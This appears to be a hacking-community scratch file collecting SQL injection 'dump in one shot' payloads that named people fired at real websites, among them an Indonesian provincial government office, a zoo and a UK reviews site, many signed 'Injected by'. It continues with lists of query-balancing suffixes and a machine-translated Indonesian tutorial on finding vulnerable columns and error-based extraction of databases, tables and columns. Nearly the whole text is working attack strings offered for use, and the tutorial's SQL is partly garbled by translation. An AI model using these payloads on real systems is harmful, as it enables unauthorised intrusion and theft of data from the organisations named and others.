104My Query # : http://disnakertrans.jatengprov.go.id/index.php/berita/lihat/?id=27'UNION SELECT 1,2,Concat(0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f692e696d6775722e636f6d2f6a544e69514d722e6a706727206865696768743d27323025272077696474683d313025273e,0x3c62723e,0x496e6a6563742062792045784c696e6565,0x3c62723e,0x3c62723e,0x75736572203e3e3e20,user/**x**/(),0x3c62723e,0x6461746162617365203e3e3e20,database/**x**/(),0x3c62723e,0x76657273696f6e203e3e3e20,@@version,0x3c62723e,0x686f73746e616d65203e3e3e20,@@hostname,0x3c62723e,0x706f7274203e3e3e20,@@port,0x3c62723e,0x62617365646972203e3e3e20,@@basedir,0x3c62723e,0x64617461646972203e3e3e20,@@datadir,0x3c62723e,0x55554944203e3e3e20,UUID(),0x3c62723e),4,5,6,7,8,9,10,11--+
105
106Kindol Query # : http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=-25%27+UNION+SELECT+1,2,concat(0x496e6a6563746564204279202e2f4d722e4b696e646f4c3c62723e3c696d67207372633d22687474703a2f2f73696d706c652d6c6966652e63662f48432e706e67222077696474683d2232303022206865696768743d22323030223e,%27<br>%27,%27Version%20::%20%27,version(),%27<br>%27,%27Database%20::%20%27,database(),%27<br>%27,%27User%20::%20%27,user(),%27<br>%27,(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=CoNCaT(@x,%27<br>%27,table_name,%27::%27,column_name))))x)),4,5,6,7,8,9,10--+
107
108Aknanta Query # : http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=-24%27 Union Select 1,2,/*!50000Concat*/(0x3c63656e7465723e3c666f6e74207374796c653d22636f6c6f723a677265656e3b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a65637465642062792053616e613c2f666f6e743e3c62723e3c696d672077696474683d22323430707822206865696768743d22323430707822207372633d2268747470733a2f2f7062732e7477696d672e636f6d2f6d656469612f4444463572306d55514145456951492e6a7067223e,0x3c62723e,0x55534552202d3e ,USER(),0x3c62723e,0x4441544142415345202d3e ,DATABASE(),0x3c62723e,0x56455253494f4e202d3e,VERSION(),0x3c62723e,0x486f73746e616d65202d3e,@@HOSTNAME,0x3c62723e,0x506f7274202d3e,@@PORT,0x3c62723e,@@datadir,0x3c62723e,@@basedir,0x3c62723e,UUID(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),4,5,6,7,8,9,10--%20-
109
110Fredley Antonny Query # : http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=51%27+and+false+union+select+1,2,concat/**_**/(%27<br>%27,%27<img%20src="https://edmli.com/wp-content/uploads/2018/04/620x310.jpg"%20height="300"%20width="200">%27,%27<br>%27,%27Injected%20by%20m337ight%27,%27</font>%27,%27<br>%27,%27Version%20::%20%27,version/**_**/(),%27</font>%27,%27<br>%27,%27Database%20::%20%27,database/**_**/(),%27</font>%27,%27<br>%27,%27Os%20::%20%27,@@version_compile_os,%27</font>%27,%27<br>%27,%27</font>%27,%27<br>%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),4,5,6,7,8,9,10--%20-
111
112Revan AR Query # : http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=-22%27%20and%200%20+union+select%201,2,concat(%27<img%20src="https://i.pinimg.com/originals/b8/73/32/b873320cd1cbb0fa19b9d99f44532a17.png"%20height=200%20width=200%20/>%27,%27<br><font%20color="maroon"%20size=4>Injected%20by%20M1nic0de<br>%27,%27<font%20%20size=2>database%20::%20%27,database(),%27<br>user%20::%20%27,user(),%27<br>version%20::%20%27,version(),%27<br>hostname%20::%20%27,@@hostname,%27<br>UUID%20Key%20::%20%27,UUID(),%27<br>port%20::%20%27,@@port),4,5,6,7,8,9,10--+
113
114Amir Hossan Rahel Query # :
115http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=.24%27%20union%20select%201,2,concat(0x696e6a65637465642062792068756e74657220696e6a6563746f72,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,@@datadir,0x3c62723e,@@port,0x3c62723e,uuid()),4,5,6,7,8,9,10--+
116
117Erik Hutabarat Query # : http://disnakertrans.jatengprov.go.id/index.php/berita/lihat/?id=.3%27+union+select+1,2,3,concat(%27<h1>Handsomeware</h1>%27,0x3c696d67207372633d2268747470733a2f2f312e62702e626c6f6773706f742e636f6d2f2d314851736e794749476f732f56343364746961394755492f4141414141414141414d302f5f714136316f6b43424e73464270466433444461514a4135753748487a554a5f41434c63422f73313630302f37393736366531663961663732623066353737373163363233313664646339312e676966222f3e,user(),%27<br>%27,version(),%27<br>%27,database(),%27<br>%27,@@datadir,%27<br>%27,uuid(),@@hostname,%27<br>%27,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))),5,6,7,8,9,10,11--+-
118
119Pow Pow Query # : http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=-24%27+union+all+select+1,2,Concat(%27%3Cimg%20src=%22http://www.makiya.sch.id/wp-content/uploads/2017/08/coiztrtteammmmmm.png%22%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22black%22%3E%3Ci%3E%3Cb%3EInjected%20by%20Rev9%3C/b%3E%3C/i%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3EPort:%20%27,@@port,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3EVersi:%20%27,Version(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Hostname%20:%20%27,/*!13337@@hostname*/,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3EDatabase:%20%27,Database(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3EUser:%20%27,User(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3EUUID:%20%27,UUID(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3ESymlink:%20%27,@@Global.have_symlink,%27%3Cbr%3E%27,%27%3Cfont%20color=%22lime%22%3E-----------------%27,@C:=0x00,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,Column_Name)),0x00,0x00),@c,0x3c2f466f6e743e,0x3c2f43656e7465723e),4,5,6,7,8,9,10--+
120www.finvent.com/details.php?id=-23'++OR+1+GROUP+BY+CONCAT_WS(0x3a,user(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+-
121
122
123My query : https://allchecked.co.uk/reviews/leicestershire/asutton-roofing-ltd'AND+0+UNION+SELECT+1,2,concat(0x273c696d67207372633d68747470733a2f2f696d61676573352e616c706861636f646572732e636f6d2f3832312f7468756d622d3335302d3832313032342e706e67206865696768743d3135302077696474683d313530202f3e27,0x273c62723e27,0x273c623e27,0x273c666f6e7420666163653d22436f6d69632053616e73204d532220636f6c6f723d22626c7565222073697a653d343e3c693e496e6a6563746564206279202e2f6b336e74616e6731313c2f693e3c2f666f6e743e27,0x273c62723e27,0x273c623e27,0x27706f7274203a3a2027,@@port,0x273c62723e27,0x2775736572203a3a2027,user(),0x273c62723e27,0x276461746162617365203a3a2027,database(),0x273c62723e27,0x2776657273696f6e203a3a2027,version(),0x273c62723e27,0x27686f73746e616d65203a3a2027,@@hostname,0x273c62723e27,0x2762617365646972203a3a2027,@@basedir,0x273c62723e27,0x2764617461646972203a3a2027,@@datadir,0x273c62723e27,0x27746d7020646972203a3a2027,@@tmpdir,0x273c62723e27,0x2773796d6c696e6b203a3a2027,@@have_symlink,0x273c62723e27,0x2753534c203a3a2027,@@have_ssl,0x273c62723e27,0x2755554944203a3a2027,UUID(),0x273c62723e27,0x2773797374656d2075736572203a3a2027,system_user(),0x273c62723e27,0x2756657273696f6e20436f6d70696c65204f53203a3a2027,@@VERSION_COMPILE_OS,0x273c62723e27,0x27626f6f6c65616e2073796e746178203a3a2027,@@FT_BOOLEAN_SYNTAX),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+-
124
125Aknanta : https://allchecked.co.uk/reviews/cardiff/pbr--windows'%20Union%20Select%201,2,concat(0x3c63656e7465723e3c666f6e74207374796c653d22636f6c6f723a677265656e3b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a65637465642062792053616e613c2f666f6e743e3c62723e3c696d672077696474683d22323430707822206865696768743d22323430707822207372633d2268747470733a2f2f7062732e7477696d672e636f6d2f6d656469612f4444463572306d55514145456951492e6a7067223e,0x3c62723e,0x55534552202d3e%20,USER(),0x3c62723e,0x4441544142415345202d3e%20,DATABASE(),0x3c62723e,0x56455253494f4e202d3e,VERSION(),0x3c62723e,0x486f73746e616d65202d3e,@@HOSTNAME,0x3c62723e,0x506f7274202d3e,@@PORT,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20-
126
127Udje : https://allchecked.co.uk/reviews/nottinghamshire/-knb-kitchennbathrooms'%20UNION%20SELECT%201,2,Concat(0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f696d6167652e6962622e636f2f6e78526d75792f69636f6e312e706e6727206865696768743d27313825272077696474683d313825273e,0x3c62723e3c666f6e7420636f6c6f723d233133304534363e3c68323e2f2a2120496e6a6563746564206279204d722e34723748753132202a2f3c2f68323e,@@version_compile_os,0x20,@@hostname,0x3a,uuid(),0x3a,@@port,0x20,@@version_compile_machine,0x3c62723e4d7953514c2056657273696f6e203a20,version(),0x3c62723e4461746162617365203a20,database(),0x3c62723e55736572203a20,user(),0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20-
128
129
130Dicky alveira : https://allchecked.co.uk/reviews/essex/info-at--mpercivalroofingcouk'%20UNION%20SELECT%201,2,CONCAT(0x3c696d67207372633d2268747470733a2f2f692e696d6775722e636f6d2f536855427633492e6a7067222077696474683d2231303022206865696768743d22313030223e,0x3c62723e,0x3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e20496e6a6563746564204279205261796d6f6e64373c2f666f6e743e,0x3c62723e,0x3c62723e,@@hostname,0x3c62723e,@@version,0x3c62723e,@@basedir,0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,@@HAVE_SYMLINK,0x3c62723e,@@datadir,0x3c62723e,@@port),4,5,6,7,8,9,10,11,12,13,24,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20-
131
132Isoroku yamamoto : https://Âallchecked.co.uk/Âreviews/cornwall/Â-allens-flat-roofing'Â+UNION+SELECT%201,2,Âconcat('injected+by+sembotÂ','<br>',user(),'<brÂ>',database(),'<br>'Â,@@hostname,'<br>',@Â@have_symlink),4,5,6Â,7,8,9,10,11,12,13,1Â4,15,16,17,18,19,20,Â21,22,23,24,25,26,27Â,28--+-
133
134Amir : https://Âallchecked.co.uk/Âreviews/angus/Âtayside-.windows'%20uÂnion%20select%201,2,Âconcat('injected%20by%20huÂnter%20injector',0x3Âc62723e,version(),0xÂ3c62723e,user(),0x3cÂ62723e,database(),0xÂ3c62723e,@@hostname,Â0x3c62723e,@@datadirÂ,0x3c62723e,@@PORT),Â4,5,6,7,8,9,10,11,12Â,13,14,15,16,17,18,1Â9,20,21,22,23,24,25,Â26,27,28--+
135
136
137
138// Query SQLChall
139
140Site : http://www.santaanazoo.org/
141
142My Query # : http://www.santaanazoo.org/supportus.php?cat=999999.9'/*!/**/UNION/**/SELECT*/ 1,2,0x3c63656e7465723e496e6a6563742062792045784c696e65653c63656e7465723e,Concat(0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f692e696d6775722e636f6d2f6a544e69514d722e6a706727206865696768743d2731323025272077696474683d363025273e,0x3c62723e,0x75736572203e3e3e20,user/**x**/(),0x3c62723e,0x6461746162617365203e3e3e20,database/**x**/(),0x3c62723e,0x76657273696f6e203e3e3e20,@@version,0x3c62723e,0x686f73746e616d65203e3e3e20,@@hostname,0x3c62723e,0x706f7274203e3e3e20,@@port,0x3c62723e,0x62617365646972203e3e3e20,@@basedir,0x3c62723e,0x64617461646972203e3e3e20,@@datadir,0x3c62723e,0x55554944203e3e3e20,UUID(),0x3c62723e),5--+
143
144Erik Hutabarat Query # : http://www.santaanazoo.org/supportus.php?cat=membership_renewal%27+union+select+1,2,3,concat(%27<h1>Handsomeware</h1>%27,0x3c696d67207372633d2268747470733a2f2f312e62702e626c6f6773706f742e636f6d2f2d314851736e794749476f732f56343364746961394755492f4141414141414141414d302f5f714136316f6b43424e73464270466433444461514a4135753748487a554a5f41434c63422f73313630302f37393736366531663961663732623066353737373163363233313664646339312e676966222f3e,user(),0x3a,database(),0x3a,version(),%27<br>%27,@@hostname,@@port,%27<br>%27,@@basedir,0x3a,@@datadir,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))),5,6,7,8,9,10,11--+-
145
146Udje Query # : http://www.santaanazoo.org/supportus.php?details=74%27=70=70%20Union%20Select%201,2,Concat(0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f696d6167652e6962622e636f2f6e78526d75792f69636f6e312e706e6727206865696768743d27313825272077696474683d313825273e,0x3c62723e3c666f6e7420636f6c6f723d233133304534363e3c68323e2f2a2120496e6a6563746564206279204d722e34723748753132202a2f3c2f68323e,0x3c62723e4d7953514c2056657273696f6e203a20,version(),0x3c62723e4461746162617365203a20,database/**x**/(),0x3c62723e55736572203a20,user(),0x3c62723e486f73746e616d65203a20,@@hostname,0x3c62723e506f7274203a20,@@port,0x3c62723e4f53203a20,@@version_compile_os,0x3c62723e55554944203a20,uuid(),0x3c62723e56657273696f6e203a20,@@version_compile_machine,0x3c62723e546d70446972203a20,@@tmpdir,0x3c62723e44617461446972203a20,@@datadir,0x3c62723e42617365446972203a20,@@basedir,0x3c62723e53796d6c696e6b203a20,@@Global.have_symlink,0x3c62723e53534c203a20,@@Global.have_ssl,0x3c62723e),4,5,6,7,8,9,10,11--%20-
147
148Fredley Antony Query # : https://www.santaanazoo.org/supportus.php?cat=membership%27+and+false+union+select+1,2,concat(0x3c696d67207372633d2268747470733a2f2f65646d6c692e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031382f30342f363230783331302e6a7067222f3e20,0x496e6a6563746564206279206d33333769676874,0x3c62723e4d7953514c2056657273696f6e203a3a20,version(),0x3c62723e43757272656e742055736572203a3a20,user(),0x3c62723e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)),4,5,6,7,8,9,10,11--%20-
149
150Amir Hossan Rahel Query # : http://www.santaanazoo.org/supportus.php?details=.8%27%20union%20select%201,2,concat(0x696e6a65637465642062792068756e74657220696e6a6563746f72,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,@@datadir,0x3c62723e,@@port,0x3c62723e,uuid(),0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),4,5,6,7,8,9,10,11--+
151
152Diky Alveira Query # : https://www.santaanazoo.org/supportus.php?cat=-corporateMembership%27%20UNION%20SELECT%201,2,3,/*!50000CONCAT*/(%27<br>%27,%27<font%20size="5"%20color="blue">%20Injected%20By%20Raymond7%27,%27</font>%27,%27<br><br>%27,%27<img%20src="https://i.imgur.com/ShUBv3I.jpg"%20height="230"%20width="230">%27,%27<br><br>%27,%27<font%20color="red">%20"%20Jika%20menyakitiku%20adalah%20jalan%20yang%20memang%20akan%20membuatmu%20bahagia,%20maka%20lakukanlah%20"%20%27,%27</font>%27,%27<br><br>%27,%27<font%20color="green">%20Version%20::%20%27,version/**_**/(),%27<br>%27,%27<font%20color="green">%20Port%20::%20%27,/*!13337@@port*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20Hostname%20::%20%27,/*!13337@@hostname*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20Database%20::%20%27,database/**_**/(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20User%20::%20%27,user/**_**/(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20GLOBAL%20SYMLINK%20::%20%27,/*!13337@@GLOBAL.have_symlink*/,%27<br>%27,%27<font%20color="green">%20DATA%20DIR%20::%20%27,/*!13337@@datadir*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20BASE%20DIR%20::%20%27,/*!13337@@basedir*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20TMP%20DIR%20::%20%27,/*!13337@@tmpdir*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20GLOBAL%20SSL%20::%20%27,/*!13337@@GLOBAL.have_ssl*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20SYSTEM%20UUID%20::%20%27,UUID(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20Current%20Database%20::%20%27,schema(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20COMPILE%20OS%20::%20%27,@@VERSION_COMPILE_OS,%27</font>%27,%27<br>%27,%27<font%20color="green">%20BOLLEAN%20SYNTAX%20::%20%27,@@FT_BOOLEAN_SYNTAX,%27</font>%27,%27<br>%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),5--%20-
153
154
155
156solution of my challenge
157me and master Revo Riwansyah query is same so i posting both of us query
158
159https://www.massagetoday.com/mpacms/mt/article.php?id=-1463+union+select+1,2,3,4,5,6,7,8,9,10,concat('Injection by Hunter injector',0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database()),12,13,14,15,16,17,18,19,20,21,22,23,24/*
160
161https://www.massagetoday.com/mpacms/mt/article.php?id=-1463+union+select+1,2,3,4,5,6,7,8,9,10,concat(%27Injection%20by%20R3V0%27,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database()),12,13,14,15,16,17,18,19,20,21,22,23,24/*
162
163
164http://metrogroup.co.id/~pdwarchi/news.php?id=26' =75 =75 Union Select 1,2,3,Concat("Your_Name~<br>",(select variable_value from information_schema.session_variables where variable_name like 0x76657273696f6e)),5,6,7,8,9,10,11,12,13-- -
165
166Version without text "version" :
167(select variable_value from information_schema.session_variables where variable_name like 0x76657273696f6e)
168
169Happy Inject...
170
171and x(point(0,0)),
172 and mod(9,4)
173
174query : http://www.microfinance.lk/member_profile.php?id=-1'+/*!50000UNION*/+/*!50000ALL*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,/*!50000concat*/('<img src="https://res.cloudinary.com/teepublic/image/private/s--_x0vkCVL--/t_Preview/b_rgb:191919,c_limit,f_auto,h_313,q_90,w_313/v1525736660/production/designs/2664250_0" height="300" </img>','<br>','INJECTED BY RESIS-07','<br>',user(),'<br>',@@version,'<br>',@@hostname,'<br>',database()),19,20,21,22--+-
175
176
177Balancing Code
178integer based ::
179
180--
181-- -
182--+-
183)--
184)-- -
185)--+-
186))--
187))-- -
188))--+-
189;%00
190) ;%00
191));%00
192%23
193%60
194%90
195and 1=1
196and '1'='1
197and (1)=(1
198php?id=(1) -- -
199
200string based ::
201
202'--+-
203')-- -
204')--+-
205'))-- -
206'))--+-
207';%00
208');%00
209'));%00
210'%23
211'%60
212'%90
213' and 1=1
214' and '1'='1
215' and (1)=(1
216php?id=(1') -- -
217
218string based double quotes ::
219
220"-- -
221"--+-
222"%23
223")-- -
224")--+-
225"))--+-
226";%00
227") ;%00
228"));%00
229"%60
230"%90
231" and 1=1
232" and '1'='1
233" and (1)=(1
234php?id=(1") -- -
235
236VGVydXMgbWF1bnlhIGFwYT8gQUJHIEJ1Z2lsIQ==
237Thanks to : Dimas Fakonntl
238
239Bagaimana menemukan Kolom yang Rentan? 25 25 25
240ANS: -
241Teknik 1: -
242gunakan -> id = -1 union pilih 1,2,3,4,5--
243use -> id = 1111/9999 / null / bybysql union pilih 1,2,3,4,5--
244use -> id = .1 / 1.2 / 12.4 union pilih 1,2,3,4,5--
245
246Catatan: - Saya menggunakan null dan bybysql. Tidak bingung dengan mereka, kamu bisa menggunakan watever u like means menggunakan data yang tidak ada [Thanks to Hack Forum]
247
248Teknik ke-2: - Parameter Salah
249Di sini Parameter Salah berarti meletakkan sesuatu yang membuat respons yang salah ke dalam PARAMETER SQL kami
250(a) 1 = 2, 1 = 0
251use -> id = 1 atau 1 = 2 union pilih 1,2,3,4,5--
252use -> id = 1 atau 1 = 0 union pilih 1,2,3,4,5--
253
254(B) Juga dapat kita gunakan memiliki, seperti, <>
255gunakan -> id = 1 memiliki / HAVING 1 = 2 union pilih 1,2,3,4,5--
256gunakan -> id = 1 1 suka / LIKE 2 union pilih 1,2,3,4,5--
257use -> id = 1 1 <> 1 union pilih 1,2,3,4,5--
258use -> id = 1 {having / and} 1 like 2 union pilih 1,2,3,4,5--
259use -> id = 1 {having / and} 1 <> 1 union pilih 1,2,3,4,5-- / * gunakan apakah memiliki atau dan
260
261Juga Anda dapat menggunakan dan pernyataan palsu / DAN SALAH
262gunakan -> id = 1 dan false union pilih 1,2,3,4,5--
263
264Teknik ke-3: - Bagi dengan 0 berarti -> / 0 dan + div + 0
265use -> id = 12/0 union pilih 1,2,3,4,5--
266
267gunakan -> id = 12 + div + 0 + union pilih 1,2,3,4,5--
268
269Teknik ke-4: - Perhatikan dengan seksama, atau gores kode sumber HTML
270
271Jumlahnya dapat ditampilkan di mana saja, ketika agak kasar, cukup ubah kueri untuk membuat semuanya lebih terlihat seperti sesuatu
272
273http://somesite.net/b.php?id=12/0 union pilih 1111,2222,3333,4444,5555--
274
275Di atas kita menggunakan 1111, 2222 bukannya 1,2 masing-masing
276
277Setelah menulis kode kode sumber terbuka, cari 'Nomor Kolom' seperti 1111,2222,3333,4444,5555 dengan menggunakan (CTRL + F: - Untuk menemukan sesuatu dalam kode sumber) Kemudian periksa di mana nomor dat muncul dalam kode sumber
278
279Terkadang nomor ditampilkan pada judul halaman.
280
281Ketika Anda mendapatkan kolom yang rentan maka Anda ingin menampilkan versi, pengguna, basis data atau beberapa bagian html untuk dapat dilihat di halaman. Jadi, 4 langkah. Ikuti Langkah-langkah ini: -
282
283i.) id = -1 union pilih 1111,2222, concat (0x223e, @@ version, 0x3c696d67207372633d22), 4444--
284Dimana
285223e => ">
2863c696d67207372633d22 => <img src = "
287* Ingat kita menggunakan 0x sehingga dat diatas kode hex berfungsi
288
289ii.) 4 cetak nama kami
290id = -1 union pilih 1111,2222, concat (0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d), 4444--
291Dimana
2920x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d => \ "> <font color = red size = 4> AAKASH </ font> <! -
293
294Teknik ke-5: -
295U mencoba semua teknik di atas tetapi stille tidak bisa mendapatkan kolom rentan maka u juga dapat menggunakan teknik kelima ini .... Wats baru dalam teknik ini Lihat: -
296
297Anda dapat menggunakan serikat pilih 1,2,3,4,5-- sebagai serikat (pilih 1,2,3,4,5) -
298gunakan: - id = -2 union (pilih 1,2,3,4,5) -
299/ * Jika Anda melihat vul col seperti 3 kemudian
300
301gunakan: - id = -2 union (pilih 1,2,333 (4 cek) / @@ versi, 4,5) -
302
303Teknik 6: - Parameter Benar
304
305gunakan -> id = 1 + di mana + 1 = 1 union pilih 1,2,3,4,5--
306use -> id = 1 + dan + 50 = 50 union pilih 1,2,3,4,5--
307use -> id = 1 = 75 = 75 union pilih 1,2,3,4,5--
308
309Teknik 7: - Brute memaksa kolom / * Terima kasih kepada Master saya Devilhunter Dante
310Frnds ketika Anda tidak dapat menemukan jumlah kolom maka Anda juga dapat menggunakan teknik ini. Dengan teknik ini tidak hanya Anda menemukan sejumlah kolom, Anda juga mendapatkan kolom yang rentan.
311Ikuti langkah-langkah berikut
3121st do -> union pilih 1--
3132nd do -> union pilih 1,2--
3143rd do -> union pilih 1,2,3--
3154th do -> union slect 1,2,3,4--
3165th do -> union pilih 1,2,3,4,5--
317
318© AKDK
319
320~ h
321
322
323
324Error Based Dump In One Shot (DIOS) - Oleh Ph.h4rh4r
325
326Kami Telah Mendiskusikan di Tutorial Kami Sebelumnya Tentang Injeksi SQL Berbasis Kesalahan.
327Dalam Tutorial Ini Anda Akan Mempelajari Cara Membangun Error Based Dump In Shot (DIOS).
328Seperti yang Kita Ketahui Bahwa dalam Error Based Query, Kami Memberikan Perintah Kami Ke server dan Memberikan Kami menghasilkan kesalahan.
329
330Jika Kami Ingin Mendapatkan versi () maka kami Berikan Permintaan Seperti ini.
331
332http://www.FakeSite.com/news.php?id=11 atau 1 grup oleh concat_ws (0x3a, versi (), lantai (rand (0) * 2)) memiliki min (0) atau 1-- -
333
334kami mendapatkan versi tercetak di halaman. versi = 5.5.42-cll
335
336Sekarang Mari kita dapatkan nama Database Primer.
337http://www.FakeSite.com/news.php?id=11 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
338dan Ini Database Primer kami.
339
340ini nama Database Primer "kkbaketo_wordpress" jadi ini adalah nama Database Primer kami. jika kita ingin mendapatkan yang lain kita biasanya Meningkatkan LIMIT 0,1 hingga LIMIT 1,1
341
342Tetapi kita juga bisa mendapatkan semua Database tanpa menggunakan LIMIT.
343Inilah SYNTAX untuk Mendapatkan Semua Database.
344
345(SELECT! X- ~ 0.FROM (SELECT (concat (0x3a3a3a, (pilih group_concat (schema_name) dari information_schema.schemata))) x) a)
346
347Sekarang Tambahkan SYNTAX ini untuk Dapatkan semua Databasis.
348
349http://www.FakeSite.com/news.php?id=(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat (schema_name) dari information_schema.schemata))) x) a) - - -
350
351dan ini Database kami.
352
353information_schema, kkbaketo_wordpress
354
355Langkah selanjutnya adalah Dapatkan The Tables.
356Inilah contohnya.
357http://www.FakeSite.com/news.php?id=11 atau 1 grup oleh concat_ws (0x7e, (pilih table_name dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) memiliki min (0) atau 1-- -
358dan kami Dapatkan Nama tabel di bawah Respons kesalahan ::
359
360Kami Hanya MENDAPATKAN satu Nama TABEL. kkbaketop_category
361
362Ini adalah nama Tabel Pertama Kami. Kita Dapat Mendapat Satu Selanjutnya dan Yang Lain dengan Meningkatkan Nilai LIMIT 0,1 hingga LIMIT 2,1 LIMIT 3,1
363Kami Meningkatkan BATAS untuk Tabel.
364LIMIT 0,1 untuk tabel 1.
365LIMIT 1,1 untuk tabel ke-2.
366Seperti yang Kita Ketahui bahwa kita Dapat DUMP Semua Tabel dan Kolom Dalam injeksi BERBASIS UNION.
367dalam ERROR BASED Dump dalam satu Shot (DIOS) kita tidak dapat Dump All Tables / Columns seperti UNION BASED Injection.
368Tapi Kita Bisa Dapatkan Beberapa Tabel / Kolom dari Basis Data dengan MEMBANGUN Kueri kami.
369
370
371Berikut ini adalah SYNTAX Kami untuk Tabel.
372
373(pilih group_concat (table_name) dari information_schema.tables di mana table_schema = database ())
374
375Sekarang tambahkan SYNTAX ini di DIOS Query kami.
376
377(SELECT! X- ~ 0 ./*! 50000FROM * / (/ *! 50000SELECT * / (/ *! 50000concat_ws * / (0x3a3a3a, (pilih group_concat (table_name) dari information_schema.tables di mana table_schema = database ()))) x) a)
378
379
380DIOS Query kami Siap untuk Tabel.
381
382http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat (table_name) dari information_schema.tables di mana table_schema = database ()))) x) a) - -
383
384Ini Meja Kami.
385
386kkbaketop_admin, kkbaketop_category, kkbaketop_content, kkbaketop_contentOld, kkbaketop_meta, kkbaketop_navigation, kkbaketop_product
387
388Kami Juga dapat HTML TAG untuk menampilkan Semua Tabel di Saluran Baru.
389HTML TAG = <BR>
390kita bisa menggunakannya dengan mengkodekannya di HEX Value atau Menempatkan Single Quote Sebelum dan Sesudah TAG HTML.
391HEX Value = 3c42523e kita harus menggunakan 0x sebelum Nilai HEX untuk Menggunakan TAG HTML.
392HEX Value = 0x3c42523e
393Menempatkan Kutipan Tunggal = '<BR>'
394
395PUT TAG HTML Sebelum Table_name.
396Hmmm sekarang Memungkinkan Tambahkan Tag ini ke Error Based DIOS Query kami dan jalankan.
397
398http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat ('<BR>', table_name) dari information_schema.tables di mana table_schema = database ()))) x) a) - -
399
400Sekarang Semua Tabel berada dalam garis BARU.
401
